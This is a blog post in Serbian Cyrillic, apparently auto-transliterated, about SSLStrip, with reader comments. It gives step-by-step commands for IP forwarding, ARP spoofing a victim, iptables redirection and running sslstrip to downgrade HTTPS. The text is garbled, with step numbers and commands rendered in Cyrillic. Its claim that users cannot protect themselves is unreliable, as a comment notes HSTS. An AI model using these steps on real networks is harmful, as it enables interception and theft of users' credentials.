ССЛСтрип: шпијунирање ССЛ саобраћаја

Мокие Марлинспике представљена на Црни шешир 2009 изврстан алат зван ССЛСтрип, усмерен на натерајте корисника да верује да је на веб локацији са ССЛ шифровањем, док се у ствари сви подаци преносе на отвореном. Поред тога, ССЛСтрип такође превари веб сервер, чије се наводно шифрирање заобилази, иако се веб локација и даље понаша као да ради.

Колико сам могао да сазнам, овај метод и даље одлично функционише. Претња је још увек присутна и сви смо изложени. Буахаха ...

Почнимо са основама: шта је дођавола ССЛ?

За оне који не знају, Сецуре Соцкетс Лаиер (ССЛ; протокол слоја сигурних сокета) и његов наследник Транспорт Лаиер Сецурити (ТЛС; безбедност транспортног слоја) су криптографски протоколи који пружају сигурну комуникацију преко мреже, обично Интернет.

ССЛ ради на слоју између апликационих протокола као што су ХТТП, СМТП, ННТП и преко протокола ТЦП транспорта, који је део ТЦП / ИП породице протокола. Иако може да обезбеди сигурност за било који протокол који користи поуздане везе (као што је ТЦП), у већини случајева се користи заједно са ХТТП-ом за формирање ХТТПС-а. ХТТПС се користи за заштиту Интернет страница на Интернету за веб апликације. ЕЦоммерце, користећи сертификате јавног кључа за проверу идентитета крајњих тачака.

ССЛСтрип ... да ли се порнографија вратила на Лет'с Усе Линук?

Операција ССЛСтрип једноставно је, заменити све ХТТПС захтеве ХТТП странице, а затим изврши МИТМ (напад «Човек у средини«) Између сервера и клијента. Идеја је да жртва и нападач комуницирају путем ХТТП-а, док нападач и сервер комуницирају путем ХТТПС-а са сертификатом сервера. Дакле, нападач је у стању да види сав промет отвореног текста жртве.

Ево видео снимка на којем можемо видети како функционише овај изврсни алат.

Како се користи ССЛСтрип

КСНУМКС.- Конфигуришите прослеђивање ИП адреса

ецхо 1> / проц / сис / нет / ипв4 / ип_форвард

КСНУМКС.- Извођење АРП МИТМ напада између две машине:

арпспооф -и етх0 -т ВОДИТЕЉ ЖРТВЕ

КСНУМКС.- Преусмерите саобраћај помоћу иптаблес:

иптаблес -т нат -А ПРЕРОУТИНГ -п тцп –одредишни порт 80 -ј РЕДИРЕЦТ –то-портс 8080

КСНУМКС.- Покрените ССЛСтрип на порт који се користи

питхон сслстрип.пи -в датотека

Како се заштитити од ССЛСтрип напада?

Ово је најлепше и најстрашније: не могу.

Као што је показао Мокие (његов видео не троши се нешто више од 69 минута) једино вероватно решење за све ово је шифровање свих ХТТП веза, односно да уобичајени и дивљи „ХТТП“ у свим својим инстанцама буде замењен „ХТТПС“, без обзира на страницу или услуга. Као што је Мокие рекла, 'проблем представља безбедни протокол који зависи од несигурног протокола".

Шта бар можете учинити као корисник смањити шансе за напад? Параноично проверите да ли је испред сваке странице која је угрожена „хттпс“ или у случају да корисници Фирефока инсталирају НоСцрипт и форсирати ХТТПС везе на свим страницама. А ово би само ефекат минимизирало, а не поништило.

izvor: Драгоњар & Мокие

Хвала Франциску што сте нам проследили информације!

Оставите свој коментар

Ваша емаил адреса неће бити објављена. Обавезна поља су означена са *

*

*

  1. За податке одговоран: Мигуел Ангел Гатон
  2. Сврха података: Контрола нежељене поште, управљање коментарима.
  3. Легитимација: Ваш пристанак
  4. Комуникација података: Подаци се неће преносити трећим лицима, осим по законској обавези.
  5. Похрана података: База података коју хостује Оццентус Нетворкс (ЕУ)
  6. Права: У било ком тренутку можете ограничити, опоравити и избрисати своје податке.

  1.   Гуидо Игнацио Игнацио дијо

    Мммм ... у вези са хттпс-ом који вас штити од пречице, релативан је.

    Не знам у којој мери митм напади нису успешни против ССЛ веза, митм напади раде на слоју везе док ссл на транспортном слоју, тако да је могуће прикупљање података.

    Давно сам радио тестове за рад на курсу који сам урадио са митм-ом у својој локалној мрежи и могуће је узимати податке послане ССЛ-ом, покушати са хотмаил-ом (који је ссл) и он враћа пролаз без проблема. Само помислите да се нападач лажно представља као мрежни пролаз и да прима све информације од жртве.

    Једини начин да сазнате да ваше информације сигурно путују је коришћење ссх тунела.

    Оно што радим ако се осећам помало прогоњено је да се повежем са својим сервером помоћу ссх-а, прођем кроз локални порт, отворим утичнице и користим интернетску везу код куће за навигацију док сам на туђем рачунару.

    И као што су рекли, не постоји начин да се овај напад избегне, осим да се осигура наш дхцп помоћу мац-а и ко се повеже ...

  2.   ПабЛорД дијо

    здраво, у команди 4 недостајао ти је "-л 8080"

  3.   Користимо Линук дијо

    у реду. Хвала!

  4.   Мартин Фариас дијо

    Да будемо прецизнији, тачка у којој се више не можете заштитити једном је ухваћена у МитМ нападу. Постоје различити начини да се заштитите од овог напада, иако је то тешко јер има варијанте.

    ЕДИТ:

    Ажурирање коментара је вредно! Открио сам да бар од јануара 2012. прегледачи цхроме и фирефок (не бих се изненадио да су сви у овом тренутку) користе заглавља ХСТС. Притом, ово заглавље решава рањивост обавештавањем прегледача да „везе“ увек морају да користе ССЛ након првог покушаја повезивања са веб локацијом (ово рањивост одржава минимално присутном). Даље, Цхроме повећава сигурност додавањем листе ХСТС локација (вероватно најпопуларнијих на мрежи). извор: http://forums.hak5.org/index.php?/topic/25322-sslstrip-not-working-with-gmail-twitter/

  5.   ХацКан & ЦуБа цо. дијо

    Врло добро, мислим да је супер кул. Идеја је заиста једноставна 😀

  6.   Користимо Линук дијо

    Као и…

  7.   ЦхамбертуКс дијо

    Да ли неко зна може ли се користити арпспооф када имамо више од једног хоста на мрежи? Хвала вам.